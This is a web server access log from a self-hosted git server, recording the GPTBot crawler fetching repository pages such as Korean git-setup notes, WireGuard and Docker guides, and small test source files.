"/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 70525] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10109] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10280] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10088] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 22220] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" +[17/Feb/2026:13:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/releases.rss" [Client 74.7.227.38] [Length 350] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/releases" +[17/Feb/2026:13:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 133670] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fclaude.md" [Client 74.7.227.38] [Length 28743] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" +[17/Feb/2026:13:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151605] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 135168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 148058] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71830] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71825] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15179] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10481] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:35:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10852] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:35:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fDOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 31618] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fMIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 35926] [Gzip 7.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" [Client 74.7.227.38] [Length 11642] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:35:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project" [Client 74.7.227.38] [Length 9865] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" +[17/Feb/2026:13:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11406] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" +[17/Feb/2026:13:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11407] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" +[17/Feb/2026:13:35:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137890] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:35:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:35:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151603] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153443] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:35:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14878] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:13:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11406] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" +[17/Feb/2026:13:35:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/README.md" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" +[17/Feb/2026:13:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/main.py" [Client 74.7.227.38] [Length 19735] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" +[17/Feb/2026:13:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest" +[17/Feb/2026:13:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main.cpp" +[17/Feb/2026:13:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main.cpp" +[17/Feb/2026:13:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11699] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt/renewal" +[17/Feb/2026:13:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr 